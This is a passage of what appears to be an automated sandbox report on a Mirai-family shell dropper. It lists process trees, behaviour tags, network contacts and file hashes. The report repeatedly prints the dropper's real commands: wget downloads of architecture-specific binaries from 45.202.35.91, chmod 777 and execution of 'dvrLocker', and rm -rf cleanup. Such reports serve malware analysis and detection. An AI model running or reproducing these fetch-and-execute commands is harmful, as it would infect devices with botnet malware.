N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description              Indicator          Process     Target
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/mkdir  N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A
File opened for reading  /proc/filesystems  /bin/ls     N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description                   Indicator           Process                                                                   Target
File opened for modification  /tmp/lib/dvrLocker  /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh  N/A

Processes

/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/102/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/110/exe]

/bin/ls

[ls -l /proc/112/exe]

/bin/ls

[ls -l /proc/113/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/141/exe]

/bin/ls

[ls -l /proc/142/exe]

/bin/ls

[ls -l /proc/145/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/150/exe]

/bin/ls

[ls -l /proc/156/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/212/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/272/exe]

/bin/ls

[ls -l /proc/275/exe]

/bin/ls

[ls -l /proc/276/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/287/exe]

/bin/ls

[ls -l /proc/289/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/306/exe]

/bin/ls

[ls -l /proc/307/exe]

/bin/ls

[ls -l /proc/316/exe]

/bin/ls

[ls -l /proc/356/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/41/exe]

/bin/ls

[ls -l /proc/42/exe]

/bin/ls

[ls -l /proc/43/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/594/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/611/exe]

/bin/ls

[ls -l /proc/612/exe]

/bin/ls

[ls -l /proc/614/exe]

/bin/ls

[ls -l /proc/615/exe]

/bin/ls

[ls -l /proc/646/exe]

/bin/ls

[ls -l /proc/652/exe]

/bin/ls

[ls -l /proc/653/exe]

/bin/ls

[ls -l /proc/655/exe]

/bin/ls

[ls -l /proc/657/exe]

/bin/ls

[ls -l /proc/658/exe]

/bin/ls

[ls -l /proc/659/exe]

/bin/ls

[ls -l /proc/660/exe]

/bin/ls

[ls -l /proc/661/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp

Files

memory/826-1-0xb6786000-0xb6797044-memory.dmp

/tmp/lib/dvrLocker

MD5 bb9275394716c60d1941432c7085ca13
SHA1 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d

memory/917-2-0xb6720000-0xb6731044-memory.dmp

memory/927-3-0xb6776000-0xb6787044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 03:32

Reported

2024-11-09 03:34

Platform

debian9-mipsbe-20240729-en

Max time kernel

26s

Max time network

27s

Command Line

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh N/A

Processes

/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/109/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/125/exe]

/bin/ls

[ls -l /proc/126/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/155/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/160/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/179/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/241/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/328/exe]

/bin/ls

[ls -l /proc/329/exe]

/bin/ls

[ls -l /proc/332/exe]

/bin/ls

[ls -l /proc/334/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/361/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/377/exe]

/bin/ls

[ls -l /proc/380/exe]

/bin/ls

[ls -l /proc/385/exe]

/bin/ls

[ls -l /proc/388/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/434/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/675/exe]

/bin/ls

[ls -l /proc/678/exe]

/bin/ls

[ls -l /proc/68/exe]

/bin/ls

[ls -l /proc/680/exe]

/bin/ls

[ls -l /proc/684/exe]

/bin/ls

[ls -l /proc/685/exe]

/bin/ls

[ls -l /proc/69/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/701/exe]

/bin/ls

[ls -l /proc/702/exe]

/bin/ls

[ls -l /proc/704/exe]

/bin/ls

[ls -l /proc/706/exe]

/bin/ls

[ls -l /proc/707/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/709/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/75/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

